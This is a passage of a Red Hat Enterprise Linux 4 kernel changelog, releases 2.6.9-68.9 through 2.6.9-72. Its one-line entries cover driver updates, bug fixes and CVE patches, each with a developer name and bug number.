logic operations in qla2x00_fw_ready (Marcus Barrow) [450645]\n-qla2xxx: correct isp84xx structure size mismatch with api (Marcus Barrow) [450645]\n-qla2xxx: correct isp84xx ioctl handling (Marcus Barrow) [450645]\n-Enable fb_radeon driver on ppc64 (Brad Peters) [350931]\n-ehca: fix for event queue overflow on ib ehca adapters (Brad Peters) [446714]\n-Fix deadlock possibility in arch_get_unmapped_area_topdown() (Vitaly Mayatskikh) [450094]\n-megaraid: Add support ibm blackrock controller (Chip Coldwell) [449718]\n-sit: Fix exploitable remote memory leak (Jiri Pirko) [446036] {CVE-2008-2136}\n-ehca: fix race possibility between qp async handler and destroy_qp (Brad Peters) [446110]\n-Fix hang when using /proc/sys/vm/drop_caches under heavy load on large system (Larry Woodman) [449381]\n-Fix possible buffer overflow in asn.1 parsing routines (Anton Arapov) [444463] {CVE-2008-1673}\n-[s390] Fix vmrm cmm use triggering oom killer (Hans-Joachim Picht) [446257]\n-[s390] fix iucv limit and cmm proc permissions (Hans-Joachim Picht) [446257]\n-Extend mce banks support to more than 6 for dunnington and nehalem (Geoff Gustafson) [446675]\n-ppc64: Fix slb shadow buffer support (Brad Peters) [440138]\n-Add hp DL385 G2 and DL585 G2 to whitelist for bfsort (Tony Camuso) [251032]\n[2.6.9-72]\n-Minor code cleanup to sys_times() call (Vitaly Mayatskikh) [448934]\n-qla2xxx: Update firmware for 4,8 gb/s adapters to version 8.02.09-d0-rhel4.7-03 (Marcus Barrow) [448641]\n-xen: minimize loss of network connectivity after guest migration (Don Dutile) [444473]\n-dm-raid: Fix bad performance of dm-raid (Mikulas Patocka) [432566]\n-Re-apply: Add HP DL580 G5 to bfsort whitelist (Tony Camuso) [429727]\n-Revert '[MOXA] buffer overflow in moxa driver' (Vivek Goyal) [423141]\n-Revert 'neofb: avoid overwriting fb_info fields' (Vivek Goyal) [430252]\n[2.6.9-71]\n-cciss: disable scsi_ioctl_send_command in cciss driver (Doug Chapman) [443053]\n-bnx2: fix panic when changing device settings while running netconsole (Andy Gospodarek) [444041]\n-Infiniband: Fix ipoib oops (Doug Ledford) [445736]\n-Fix system lockup in eventpoll (Josef Bacik) [446409]\n-ptrace: fix ptrace_attach and ptrace_detach race (Jerome Marchand) [311931]\n-diskdump: Fix diskdump regression in rhel 4.6 (Chip Coldwell) [268921]\n-[s390] ptrace: restore single_step behavior after do_signal (Jerome Marchand) [426647]\n-[NET] change skb_reserve to have signed length (Neil Horman) [445774]\n-x86_64: ia32 syscall restart fix (Jerome Marchand) [435000]\n-ehca: fix ehca driver for use with dapl (Doug Ledford) [443072]\n-ibmebus: Cleanup all devices upon module rmmod (Brad Peters) [441739]\n-sys_times: Fix system unresponsiveness during many concurrent invocation of sys_times (Vitaly Mayatskikh) [435280]\n-ehea: support ipv4 checksum capability only (Brad Peters) [439445]\n-xen: Fix blkfront deadlock on pv restore (Don Dutile) [429103]\n-Re-apply: Fix usb stress test issue on amd sbx00 systems (Bhavana Nagendra) [435787]\n-libata: ahci kill spurious ncq completion detection (David Milburn) [432396]\n-libata: implement ATA_PFLAG_RESETTING (David Milburn) [432396]\n[2.6.9-70]\n-proc pid limits: fix duplicate file names (Neil Horman) [443825]\n-md: make md pack rdev list (Doug Ledford) [194585]\n-Add needed locking to fcheck() in both dnotify.c and locks.c (Alexander Viro) [443438 439757] {CVE-2008-1669 CVE-2008-1375}\n-bonding: fix link monitor capability check (Andy Gospodarek) [441897]\n-Kernel doesn not clear DF for signal handlers (Vitaly Mayatskikh) [437315] {CVE-2008-1367}\n-Fix pv on hvm crash due to vnif increase patch (Don Dutile) [442538]\n-pv on hvm: memory corruption due to vnif increase (Don Dutile) [442298]\n-oprofile fix for penryn based procs (Geoff Gustafson) [439540]\n-sound: Fix sound driver update compilation error (Vivek Goyal) [319701 228440 228443 216447 248060 240912]\n-sound: Enable CONFIG_SND_INTEL_HDA=m driver (Vivek Goyal) [319701 228440 228443 216447 248060 240912]\n-Add HDMI audio support for AMD ATI chipsets (Bhavana Nagendra) [428964]\n-Dual core chips reported as quad core in cpuinfo (Geoff Gustafson) [326781]\n-alsa: Unmute DACs on AMD shiner (ad1884) (Brian Maly) [351911 314391]\n-[SOUND] azx sound driver update (Brian Maly) [319701 228440 228443 216447 248060 240912 234358]\n-Revert 's390: qeth: tcpdump does not work with osa Layer2 and VLAN enabled' (Vivek Goyal) [379031]\n[2.6.9-69]\n-Updated the spec file for beta build numbering (Vivek Goyal)\n[2.6.9-68.34]\n-Fix memory leak of struct percpu_data in free_percpu (Larry Woodman) [441321]\n-Do not limit shmem locked memory when rlimit_memlock is rlim_infinity (Larry Woodman) [439926]\n-sata: fix work around sb600 sata hw errata (Bhavana Nagendra) [300861]\n-diskdump: Fix flush_cpu_workqueue so that diskdump can work after momentary link down of lpfc (Takao Indoh) [216618]\n-Revert 'Fix usb stress test issue on amd sbx00 systems' (Vivek Goyal) [435787]\n[2.6.9-68.33]\n-enhanced partition statistics: fix update partition statitics (Jerome Marchand) [233579]\n-enhanced partition statistics: fix core statistics (Jerome Marchand) [233579]\n-qla2xxx: isp84xx variant ioctl support (Marcus Barrow) [441445]\n-qla2xxx: isp84xx variant support (Marcus Barrow) [441445]\n-pci: fix quirk for ht1000 bridge chips (Andy Gospodarek) [439109]\n-rpc: do not block on skb allocation (Jeff Layton) [439436]\n-nmi: kill disable_irq calls (Aristeu Rozanski) [172749]\n-nmi: disable lapic and io apic nmis on unknown_nmi_panic (Aristeu Rozanski) [172749]\n-nmi: use perfctr functions for probing (Aristeu Rozanski) [172749]\n-nmi: update check_nmi_watchdog (Aristeu Rozanski) [172749]\n-nmi: update reserve_lapic_nmi (Aristeu Rozanski) [172749]\n-nmi: use setup_apic_nmi_watchdog and stop_apic_nmi_watchdog in suspend resume (Aristeu Rozanski) [172749]\n-nmi: change nmi_active usage (Aristeu Rozanski) [172749]\n-nmi: update nmi_watchdog_tick (Aristeu Rozanski) [172749]\n-nmi: modify setup_acpi_nmi_watchdog to handle both io apic and lapic (Aristeu Rozanski) [172749]\n-nmi: introduce do_nmi_callback (Aristeu Rozanski) [172749]\n-nmi: introduce per cpu wd_enabled (Aristeu Rozanski) [172749]\n-nmi: add perfctr infrastructure (Aristeu Rozanski) [172749]\n-[SCSI] aic79xx: fix timer handling (David Milburn) [243936]\n[2.6.9-68.32]\n-xen: Fix gettimeofday is not monotonically increasing on xenU (Don Dutile) [438975]\n-xen: config file additions for xen pv-on-hvm drivers (Don Dutile) [437423]\n-xen: pv-on-hvm driver subsystem for non xen kernels (Don Dutile) [437423]\n-xen: modifications to drivers/xen/ files for pv on hvm use (Don Dutile) [437423]\n-xen: pv on hvm kconfig and makefile changes (Don Dutile) [437423]\n-xen: pv.h file modifications for compilation on xen and non xen kernels (Don Dutile) [437423]\n[2.6.9-68.31]\n-qla4xxx: race condition fixes with constant qla3xxx ifup/ifdown (Marcus Barrow) [430313]\n-qla4xxx: Fix targets not seen on first port (Marcus Barrow) [425721]\n-Fix compilation warnings coming from module.h (Vivek Goyal) [280431]\n-qla4xxx: Handle multiple ports per target (Marcus Barrow) [412671]\n-qla4xxx: Update driver version string to 5.01.02-d1 (Marcus Barrow) [317631]\n-qla4xxx: Throttle on queue full errors (version 5.01.02-d1) (Marcus Barrow) [317631]\n[2.6.9-68.30]\n-Fix __call_usermodehelper wait_for_helper race condition (Dave Anderson) [438800]\n-nfs: 32 bit nfs server returns eio for readdirplus request when backing file system has 32bit inodes (Peter Staubach) [438723]\n-Ensure IV is in linear part of the skb to avoid BUG due to OOB access (Thomas Graf) [427246]\n-Enhanced partition statistics: documentation (Jerome Marchand) [233579 310521]\n-Enhanced partition statistics: Fill old partition statistics with right data (Jerome Marchand) [233579 310521]\n-Enhanced partition statistics: procfs changes (Jerome Marchand) [233579 310521]\n-Enhanced partition statistics: sysfs changes (Jerome Marchand) [233579 310521]\n-Enhanced partition statistics: update partition statitics (Jerome Marchand) [233579 310521]\n-Enhanced partition statistics: core statistics (Jerome Marchand) [233579 310521]\n[2.6.9-68.29]\n-Revert 'Add HP DL580 G5 to bfsort whitelist' (Vivek Goyal) [429727]\n-fix unprivileged crash on x86_64 cs corruption (Jarod Wilson) [439786]\n-ixgbe: Build module ixgbe CONFIG_IXGBE=m (Andy Gospodarek) [305051]\n-x86_64: add /dev/msr[0-n] device files (Jason Baron) [249514]\n-i386: Fix extended cpu model field being ignored (Geoff Gustafson) [439539]\n-x86_64: Fix hpet bug where system hangs during reboot cycle (Geoff Gustafson) [434854]\n-i386: Allow apicid to be 8 bit (Geoff Gustafson) [437821]\n-ixgbe: initial support code (Andy Gospodarek) [305051]\n-nfs: fix setgid handling in notify_change (Jeff Layton) [439253]\n-e1000: upstream update and alternate mac address support (Andy Gospodarek) [298901]\n[2.6.9-68.28]\n-powernow k8: fix UP kernel to register freq driver (David Milburn) [429519]\n-spec: fix summary description of largesmp kernel package (Vivek Goyal) [186606]\n-qla2xxx: Avoid delay for loop ready when loop dead (Marcus Barrow) [426411]\n-qla2xxx: Build qla25xx as module CONFIG_SCSI_QLA25XX=m (Marcus Barrow) [253287]\n-qla2xxx: Clean up firmware dumping mechanism for ISP25xx adapter (Marcus Barrow) [253287]\n-qla2xxx: Support ISP25xx adapters for 8GB/s (Marcus Barrow) [253287]\n-qla2xxx: Firmware support for new 8 GB/s adapter QLE25xx (Marcus Barrow) [253287]\n-qla2xxx: update 4 GB/s firmware to match 8 GB/s firmware (Marcus Barrow) [253287]\n-ext3: lighten up resize transaction requirements (Eric Sandeen) [166038]\n-nfs: Fix nfs_access_cache_shrinker race with umount (Peter Staubach) [433249]\n-hangcheck timer: remove monotomic clock dependencies (Brian Maly) [429928]\n-Fix execve returning EFBIG when running 4 GB executable (Dave Anderson) [393501]\n-[NET] Fix the redirect packet of the router if the jiffies wraparound (Thomas Graf) [428934]\n-bnx2: update to upstream version 1.6.9 (Andy Gospodarek) [311531 303051 310851]\n-Fix race condition in proc file reading that leads to module refcnt imbalance (Neil Horman) [280431]\n[2.6.9-68.27]\n-infiniband: hotcpu_notifier backport (Doug Ledford) [309591]\n-infiniband: Remove the unused cxgb3/core directory and files (Doug Ledford) [309591]\n-infiniband: Dont set CONFIG_MLX4_CORE on ppc64 iseries (Vivek Goyal) [309591]\n-infiniband: Enable various infiniband related config options (Vivek Goyal) [309591]\n-infiniband: additional kernel backports needed for ppc64 (Doug Ledford) [309591]\n-infiniband: update kconfig files so that setting infiniband off kills it all (Doug Ledford) [309591]\n-infiniband: backport for interrupt handler changes (Doug Ledford) [309591]\n-infiniband: add the genalloc backport (Doug Ledford) [309591]\n-infiniband: minor backports (Doug Ledford) [309591]\n-infiniband: util updates (Doug Ledford) [309591]\n-infiniband: srp updates (Doug Ledford) [309591]\n-infiniband: sdp updates (Doug Ledford) [309591]\n-infiniband: core updates and makefile kconfig changes (Doug Ledford) [309591]\n-infiniband: additional backport (Doug Ledford) [309591]\n-infiniband: move vnic to qlgc_vnic (Doug Ledford) [309591]\n-infiniband: ipoib updates (Doug Ledford) [309591]\n-infiniband: various header config updates (Doug Ledford) [309591]\n-infiniband: ehca driver update (Doug Ledford) [309591]\n-infiniband: nes hardware driver update (Doug Ledford) [309591]\n-infiniband: mthca driver update (Doug Ledford) [309591]\n-infiniband: ipath driver update (Doug Ledford) [309591]\n-infiniband: cxgb3 driver update (Doug Ledford) [309591]\n-infiniband: amso1100 driver update (Doug Ledford) [309591]\n-infiniband: kill off some uninitialized_var usage that breaks our kernel (Doug Ledford) [309591]\n-additional kernel.h backports (Doug Ledford) [309591]\n-infiniband: move a couple backports (Doug Ledford) [309591]\n-infiniband: add the mlx4 core net and infiniband drivers (Doug Ledford) [309591]\n-infiniband: move the vnic driver to qlgc_vnic (Doug Ledford) [309591]\n-bnx2x: enable bnx2x module CONFIG_BNX2X=m (Vivek Goyal) [328001]\n-Fix ext3 direct IO problem that occurs under memory pressure (Josef Bacik) [381221]\n-wacom: add support to cintiq 20wsx tablets (Aristeu Rozanski) [436890]\n-io_apic: fix irq race in check_timer (Brian Maly) [432405]\n-cxgb3: update to driver to support ofed 1 3 (Andy Gospodarek) [253452]\n-igb: update to upstream version 1.0.8-k2 (Andy Gospodarek) [298881]\n-e1000e: update to latest upstream (Andy Gospodarek) [311961 432364]\n-usb: Fix sporadic hangs in usb (Pete Zaitcev) [239723]\n-bnx2x: initial support for bcm57710 (Andy Gospodarek) [328001]\n-Fix usb stress test issue on amd sbx00 systems (Bhavana Nagendra) [435787]\n-mptfusion: Fix IO failures when host reset of adapter is in progress (Chip Coldwell) [429368]\n-mptfusion: Fix oops in mptctl_gettargetinfo due to null ioc raid_data piocpg3 (Chip Coldwell) [429623]\n-mptfusion: update mptfusion to version 3-12-19-00 (Chip Coldwell) [308341]\n-lpfc: update lpfc driver to version 8.0.16.40 (Chip Coldwell) [326931]\n-aacraid: update aacraid driver to version 1.1.5-2455 (Chip Coldwell) [300021]\n-aacraid: update aacraid driver to version 1.1.5-2453 (Chip Coldwell) [300021]\n-megaraid: Update megaraid_sas driver to version 3.18 (Chip Coldwell) [312061]\n-x86_64: fix 32-bit thread debugging (Jerome Marchand) [311881]\n-arcmsr: update the arcmsr driver to version 1.20.00.15.rh (Tomas Henzl) [428801]\n-e1000: disable pci-e completion timeouts on pseries (Andy Gospodarek) [231676]\n-[SCSI] ibmvscsi: add slave_configure to allow device restart (Brad Peters) [364601]\n-Request to demand load dm cluster logging module (Jonathan Brassow) [438834]\n-nfsv4: create dedicated workqueue for handling nfs4_close_state_work (Jeff Layton) [402581]\n-nfs: allow nfsv4 files open for write to invalidate caches (Jeff Layton) [359651]\n-k8_edac: add option to report gart errors (Aristeu Rozanski) [232488]\n-nfs: Allow RHEL4 to do READDIR on directory containing a referral (Jeff Layton) [227610]\n[2.6.9-68.26]\n-[SPEC] fix add call to weak modules script in spec file (Vivek Goyal) [438688]\n-[s390] qdio: FCP/SCSI write IO stagnates on LPAR (Hans-Joachim Picht) [436992]\n-lro: Build lro as module CONFIG_INET_LRO=m (Ed Pollard) [300201]\n-ehea: driver update and modifications to sync with upstream (Ed Pollard) [300201]\n-ehea: Fixes to make LRO compile in RHEL 4.7 (Ed Pollard) [300201]\n-ehea: Pull LRO support from upstream (Ed Pollard) [300201]\n-getrusage: fill ru_inblock and ru_oublock fields if possible (Jerome Marchand) [247285]\n-io accounting: set up config_task_io_accounting (Jerome Marchand) [247285]\n-io accounting: report in procfs (Jerome Marchand) [247285]\n-io accounting: account for direct io (Jerome Marchand) [247285]\n-io accounting: read accounting cifs fix (Jerome Marchand) [247285]\n-io accounting: read accounting nfs fix (Jerome Marchand) [247285]\n-io accounting: read accounting (Jerome Marchand) [247285]\n-io accounting: write cancel accounting (Jerome Marchand) [247285]\n-io accounting: write accounting (Jerome Marchand) [247285]\n-io accounting: core statistics (Jerome Marchand) [247285]\n-[PPC64] Add kernel support for storing slb entries, for cpu failure recovery (Brad Peters) [300081]\n-[Power6] Extend alignment exception handler to handle new floating point load, store instructions (Brad Peters) [300071]\n[2.6.9-68.25]\n-alsa: fix 32 to 64 bit pcm api conversion layer (Jaroslav Kysela) [429944]\n-[SPEC] Add call to weak modules script in spec file (Jon Masters) [438115]\n-bonding: 802.3ad: Fix no carrier on no partner found (Vince Worthington) [437865]\n-stex: update stex driver (Jeff Garzik) [251560]\n-s2io: Update to driver version 2.0.25.1 (Andy Gospodarek) [298551]\n-diskdump: fix diskdump to print warning message about large block_order (Takao Indoh) [219639]\n-[IPV4]: Fix fragmentation with header options (Thomas Graf) [214903]\n-sctp: backport new sctp receive buffer management code to rhel4 (Neil Horman) [200813]\n-diskdump: Diskdump performance regression in mptfusion driver (Takao Indoh) [438027]\n-[NETFILTER]: fix module to prevent deadlock via module refcounting (Neil Horman) [212922]\n[2.6.9-68.24]\n-Fix greyhound event based profiling support patch (Bhavana Nagendra) [437982]\n-forcedeth: update to upstream version 0.61 (Andy Gospodarek) [253592]\n-sata: work around sb600 sata hw errata (Jeff Garzik) [300861]\n-tg3: update to upstream version 3.86 (Andy Gospodarek) [324251]\n-[TCP] Fix tcp assertion where packets_out exceeds fackets_out (Thomas Graf) [296561]\n-i2c_piix4: Enable i2c_piix4 module on x86_64 (Prarit Bhargava) [424541]\n-Fix 64 bit dma issue on sb700 systems (Bhavana Nagendra) [434742]\n-ipr: dual sas raid adds support for new pci-e ipr adapters (Brad Peters) [299101]\n-ipr: dual sas raid escalates error handler failures all the way to host reset (Brad Peters) [299101]\n-[XEN] Fix xen pv netfront oops during live migrate (Chris Lalancette) [435351]\n-ICH10: Add relevant PCI device IDs to support ICH10 (Geoff Gustafson) [304101]\n-Retry: check to see if agp is valid before reporting aperture size warnings (Brian Maly) [392771 431897]\n[2.6.9-68.23]\n-pci: mmconfig patches 68.22 build breakage fix (Tony Camuso) [437837]\n-Add config_dm_multipath_hp to generic config (David Wysochanski) [195685]\n-xen: expand vnif number per a guest domain over four (Don Dutile) [435448]\n-sata_svw: update sata_svw driver to support broadcom HT1100 chipset (John Feeney) [234159]\n-qla3xxx: new 4032 does not work with vlan (Marcus Barrow) [314301]\n-Add greyhound event based profiling support (Bhavana Nagendra) [433524]\n-Adding sb800 sata controller support (Bhavana Nagendra) [299901]\n-dm-multipath: path group initialization retry support for hp hardware handler (David Wysochanski) [195685]\n-dm-multipath: add path group initialization retry support to generic multipath layer (David Wysochanski) [195685]\n-dm-multipath: add hp handler for HP active/passive array (David Wysochanski) [195685]\n-[s390] qeth: ifenslave -c causes kernel panic with vlan and osa layer2 (Hans-Joachim Picht) [387041]\n-[s390] zfcp: scsi LUNs going offline during cablepull or MC update (Hans-Joachim Picht) [207558]\n-[s390] zfcp: Various driver bugfixes from upstream (Hans-Joachim Picht) [248934]\n-Build PowerNow-k8 as module (Brian Maly) [234145]\n[2.6.9-68.22.EL]\n-xen: save restore migration of 32 bit pv guests can fail under load (Don Dutile) [431081]\n-sysfs: Keep away from adding an existing dirent (Josef Bacik) [383101]\n-[IA64] Avoid unnecessary tlb flushes when allocating memory (Doug Chapman) [424771]\n-[PCI] pci config: remove mmconf blacklist (Tony Camuso) [250313]\n-[PCI] pci config: Use PortIO to access config offsets below 256 byte (Tony Camuso) [250313]\n-wacom: add support to intuos3 12x19 (Aristeu Rozanski) [278681 253088]\n-wacom: add support to intuos3 12x12 (Aristeu Rozanski) [278681 253088]\n-wacom: fix the maximum distance value (Aristeu Rozanski) [278681 253088]\n-wacom: change cintiq interrupt handler (Aristeu Rozanski) [278681 253088]\n-wacom: add support for intuos3 4x6 (Aristeu Rozanski) [278681 253088]\n-wacom: use enum definitions for wacom models (Aristeu Rozanski) [278681 253088]\n-neofb: avoid overwriting fb_info fields (Vitaly Mayatskikh) [430252]\n[2.6.9-68.21.EL]\n-skge: do not clear multicast state on link down (Andy Gospodarek) [377611]\n-net: drop duplicate frames on vlan accelerated bonding interfaces (Andy Gospodarek) [295161]\n-ipmi: initialize second bmc properly (Peter Martuccelli) [411041]\n-diskdump: do not disregard crc error of the diskdump module (Takao Indoh) [248766]\n-Make kernel build when CONFIG_HIGHMEM is not set (Jason Baron) [185202]\n-Add HP DL580 G5 to bfsort whitelist (Tony Camuso) [429727]\n-sched: Exiting process returns its first time_slice to wrong process (Vitaly Mayatskikh) [238034]\n-Fix e820 map hole size calculations (Larry Woodman) [206113]\n-[NET] bonding: add MAC based failover support to bonding driver (Brad Peters) [300031]\n-[SCSI] aic7xxx: fix ahc_done check SCB_ACTIVE for tagged transactions (David Milburn) [223333]\n[2.6.9-68.20.EL]\n-EDAC: Add CONFIG_EDAC_I5000 option to config files (Vivek Goyal) [235936]\n-Reset LEDS on dell usb keyboards (John Feeney) [225361]\n-Tolapai: Report correct cpu cache info (Geoff Gustafson) [426301]\n-Tolapai: sata and i2c support (Geoff Gustafson) [304131]\n-Fix memory leak in alloc_disk_node (Jerome Marchand) [435892]\n-jbd: Fix journal overflow issues (Josef Bacik) [183119]\n-knfsd: Ratelimit remotely triggered rpc error messages (Chris Snook) [428149]\n-pata_jmicron: match devices using vendor and device class only and update quirk for JMB361/3/5/6 (Aristeu Rozanski) [337671]\n-cciss: Add SG_IO ioctl and fix error reporting for SG_IOCTL (Tomas Henzl) [293651]\n-cciss: add init of drv->cylinders back to cciss_geometry_inquiry (Tomas Henzl) [432026]\n-cciss : Modify /proc/driver/cciss entries to avoid system crash (Tomas Henzl) [432480]\n-EDAC: add support to intel 5000 chipsets (Aristeu Rozanski) [235936]\n[2.6.9-68.19.EL]\n-edac: Add CONFIG_EDAC_I3000 option to config files (Vivek Goyal) [427799]\n-cdrom: kill 'open failed' message (John Feeney) [247446]\n-Insufficient range checks in fault handlers with mremap (Vitaly Mayatskikh) [428969] {CVE-2008-0007}\n-Fix CDROM mounting problem when changing isos in iseries legacy (Brad Peters) [334651]\n-[PPC64] xmon: Make xmon= off work on rhel 4 (Brad Peters) [426878]\n-cciss: Change version number to 3.6.20-RH1 (Tomas Henzl) [426109]\n-cciss: Support new SAS/SATA controllers (Tomas Henzl) [426111]\n-cciss: Copyright information updated as per HP Legal (Tomas Henzl) [426110]\n-cciss: Remove read_ahead and use block layer defaults instead (Tomas Henzl) [426114]\n-Fix unix stream socket recv race condition (Hideo AOKI) [433685]\n-[NET] Fix socket name string length returned by sys_getsockname (Doug Ledford) [434554]\n-EDAC: add support to intel 3000 3010 chipsets (Aristeu Rozanski) [427799]\n-Revert 's390:qdio/qeth: make sure sent skbs are freed in time' (Vivek Goyal) [381041]\n[2.6.9-68.18.EL]\n-nlm: fix a client side race on blocking locks (Jeff Layton) [432855]\n-nlm: cleanup for blocked locks (Jeff Layton) [432855]\n-[PPC] Support for cpu freq values great than 32 bit on power5/6 (Guy Streeter) [373031]\n-[SCSI] fix kernel panic caused by scsi medium error (Takahiro Yasui) [242046]\n-forcedeth: msi bugfix: Stop using stale irq number (Andy Gospodarek) [359231]\n-ide: __ide_end_request check for empty list before dequeuing request (David Milburn) [426279]\n-redhat will not ipl with more than 64 procs (Scott Moser) [248428]\n-[MOXA] buffer overflow in moxa driver (Vitaly Mayatskikh) [423141] {CVE-2005-0504}\n-s390: cio: collection of update patches (Hans-Joachim Picht) [380931]\n-s390:qdio/qeth: make sure sent skbs are freed in time (Hans-Joachim Picht) [381041]\n-s390: qeth: tcpdump does not work with osa Layer2 and VLAN enabled (Hans-Joachim Picht) [379031]\n-make concurrent proc net dev reads return sane stats for bonds (Chris Snook) [430576]\n[2.6.9-68.17.EL]\n-Missing sb600 sb700 40 pin ide cable support (Bhavana Nagendra) [431440]\n-SB700 contains two ide channels (Bhavana Nagendra) [335361]\n-smbus: AMD ATI SB600 700 800 use same smbus controller devid (Bhavana Nagendra) [252287]\n-libata: un-blacklist hitachi drives to enable NCQ (David Milburn) [430293]\n-libata: sata_nv may send commands with duplicate tags (David Milburn) [430293]\n-add mutex_destroy() definition (Jason Baron) [233234]\n-sunrpc: print unsigned integers in stats (Jeff Layton) [401861]\n-nfsd: don t try to cache reply to nfsv2 readdir (Jeff Layton) [430946]\n-sunrpc: make sure portmap calls are always soft RPC tasks (Jeff Layton) [248787]\n-[NET] link_watch: always schedule urgent events (Don Dutile) [429930]\n-nfs: don t expose internal readdir errors to userspace (Jeff Layton) [354371]\n-nfs4: Make sure nfs4 mounts are interruptable when intr is specified (Jeff Layton) [151085]\n[2.6.9-68.16.EL]\n-[XEN] Fix xen pv oops when mmaping prot_none during save restore (Chris Lalancette) [311431]\n-[NET] link_watch: handle jiffies wraparound (Vince Worthington) [433698]\n-IA64: user data corruption on misaligned access with certain fp instructions (Luming Yu) [430918]\n-xen: xenbus suspend_mutex remains locked after transaction failure (Don Dutile) [250381]\n-hotplug: acpiphp: avoid acpiphp cannot get bridge info pci hotplug failure (Konrad Rzeszutek) [287741]\n-[COREDUMP] add MMF_DUMP_ELF_HEADERS flag support (Hideo AOKI) [235742]\n-[COREDUMP]: Documentation for coredump filter (Hideo AOKI) [235742]\n-[COREDUMP] elf: add coredump filtering feature (Hideo AOKI) [235742]\n-[COREDUMP]: add an interface for coredump filter (Hideo AOKI) [235742]\n-kswapd: kswapd does not use lower_zone_protection value properly, resulting in oomkill (Larry Woodman) [358731]\n[2.6.9-68.15.EL]\n-nfs: Introduce nfs.enable_ino64 command line parameter to enable/disable 32bit inode numbers (Peter Staubach) [213518]\n-nfs: 32 bit nfs client does not handle 64 inodes correctly. Server side changes. (Peter Staubach) [213518]\n-nfs: 32 bit nfs client does not handle 64 inodes correctly. Client side change (Peter Staubach) [213518]\n-xen: rapid block device plug unplug leads to kernel crash and or soft lockup (Don Dutile) [426031]\n-[NET] make tcp_input_metrics get minimum rto via tcp_rto_min (Anton Arapov) [427204]\n-acpiphp: differentiate between slot empty and slot power off (Prarit Bhargava) [248489]\n-Fix IPI interrupt storm on IA64 (Prarit Bhargava) [359671]\n-smbfs: Fix calculation of size parameter in smb_receive (Jeff Layton) [355141]\n-smbfs: fix more warnings and errors with debug builds (Jeff Layton) [355141]\n-smbfs: Fix debug logging only compilation error (Jeff Layton) [355141]\n-smbfs: smbfs readdir vs signal fix (Jeff Layton) [355141]\n-smbfs: Fix names_cache memory leak (Jeff Layton) [355141]\n-smbfs: smb_file_open retval fix (Jeff Layton) [355141]\n-smbfs: Turn null dereference into BUG() (Jeff Layton) [355141]\n-smbfs: fix data corruption in smb_proc_setattr_unix (Jeff Layton) [355141]\n[2.6.9-68.14.EL]\n-epoll_wait with negative timeout value results in bogus printk (Peter Staubach) [278961]\n-proc: add /proc/\n/limits (Neil Horman) [207340]\n-ACPI PCIE hotplug fails due to non receipt of acpi events (Konrad Rzeszutek) [252262]\n-Powernow-k8: Get rid of unnecessary error messages with synchronized p state transitions (Konrad Rzeszutek) [276771]\n-ide : handle ide removeable drives properly (Josef Bacik) [249061]\n-[AIO] account for io wait properly (Jeff Moyer) [220902]\n-nfs:for nfs4_create_exclusive, reset any fields set in attrmask (Jeff Layton) [196180]\n-nfs: set attrmask correctly on nfs4_create_exclusive reply (Jeff Layton) [196180]\n-Implement udp_poll to reduce likelyhood of false positive return from select() (Neil Horman) [212321]\n[2.6.9-68.13.EL]\n-sunrpc: dont retry portmap query forever if it is not responding (Jeff Layton) [204309]\n-nfs: Discard pagecache data for dirs on denty_iput (Jeff Layton) [364361]\n-Fix /proc/cpuinfo giving wrong model number information (John Feeney) [313631]\n-nfs: fix ATTR_KILL_S*ID handling on NFS (Jeff Layton) [225557]\n-[NET] kernel needs to support TCP_RTO_MIN (Anton Arapov) [251240]\n[2.6.9-68.12.EL]\n-eHEA: add poll_controller support to eHEA to support netdump and netconsole (Neil Horman) [249041]\n-Display count of pagecache pages in show_mem output (Larry Woodman) [428014]\n-Prevent long delay before OOM killer launches (Larry Woodman) [252939]\n-x86_64: Prevent iounmap from sleeping with a spinlock held (Larry Woodman) [361931]\n-i8042: remove polling timer support (David Milburn) [340561]\n-hfs: Do not mount the fs if hfs can t find the root inode (Josef Bacik) [223514]\n[2.6.9-68.11.EL]\n-cifs: update changes file and version string (Jeff Layton) [427544]\n-cifs: fix endian conversion problem in posix mkdir (Jeff Layton) [427544]\n-cifs: fix potential data corruption when writing out cached dirty pages (Jeff Layton) [427544]\n-cifs: when mount helper missing fix slash wrong direction in share (Jeff Layton) [427544]\n-cifs: fix error message about packet signing (Jeff Layton) [427544]\n-cifs: fix cifsd to shut down when signing fails during mount (Jeff Layton) [427544]\n-cifs: reduce chance of list corruption in find_writable_file (Jeff Layton) [427544]\n-cifs: fix memory leak in statfs to very old servers (Jeff Layton) [427544]\n-cifs: fix buffer overflow if server sends corrupt response to small request (Jeff Layton) [372981] {CVE-2007-5904}\n-cifs: log better errors on failed mounts (Jeff Layton) [427544]\n-cifs: fix oops on second mount to same server when null auth is used (Jeff Layton) [427544]\n-cifs: fix spurious reconnect on 2nd peek from read of SMB length (Jeff Layton) [427544]\n-cifs: fix bad handling of EAGAIN error on kernel_recvmsg in cifs_demultiplex_thread (Jeff Layton) [427544]\n-cifs: have older kernels clean out pages list in cifs_readpages (Jeff Layton) [427544]\n-cifs: add inline cifs_filemap_write_and_wait for older kernels (Jeff Layton) [427544]\n-cifs: add mutex_lock and mutex_unlock definitions (Jeff Layton) [427544]\n-cifs: account for change of kmem_cache_t to struct kmem_cache (Jeff Layton) [427544]\n-cifs: remove duplicate kzalloc definition (Jeff Layton) [427544]\n-cifs: Import cifs stock version 1.50c (Jeff Layton) [427544]\n-audit: break execve records into smaller parts (Eric Paris) [427532] {CVE-2008-0004}\n-eHEA: Fix kernel panic on DLPAR remove of eHEA (real fix) (Scott Moser) [253765]\n-Revert 'check to see if agp is valid before reporting aperture size warnings' (Vivek Goyal) [392771]\n[2.6.9-68.10.EL]\n-s390: qeth: discard inbound packets with unknown header id (Hans-Joachim Picht) [350871]\n-s390: qeth: hipersockets layer-3 interface to drop non-IP packets (Hans-Joachim Picht) [380961]\n-check to see if agp is valid before reporting aperture size warnings (Brian Maly) [392771]\n-xen: local domu to domu ssh broken when firewall enabled (Don Dutile) [414131]\n-nfs: multithreaded file lock/unlock issues over NFS (Sachin Prabhu) [346331]\n-Dont truncate /proc/PID/environ at 4096 characters (Anton Arapov) [254037]\n[2.6.9-68.9.EL]\n-udf: fix possible leakage of blocks (Eric Sandeen) [202765]\n-udf: fix possible udf data corruption (Eric Sandeen) [202765]\n-udf: support files larger than 1g (Eric Sandeen) [202765]\n-udf: add assertions in udf_discard_prealloc (Eric Sandeen) [202765]\n-udf: use get_bh instead of directly accessing b_count (Eric Sandeen) [202765]\n-udf: introduce struct extent_position (Eric Sandeen) [202765]\n-udf: use sector_t and loff_t for file offsets (Eric Sandeen) [202765]\n-udf: fix possible udf deadlock and memory corruption (Eric Sandeen) [202765]\n-udf: deadlock on unmount fix (Eric 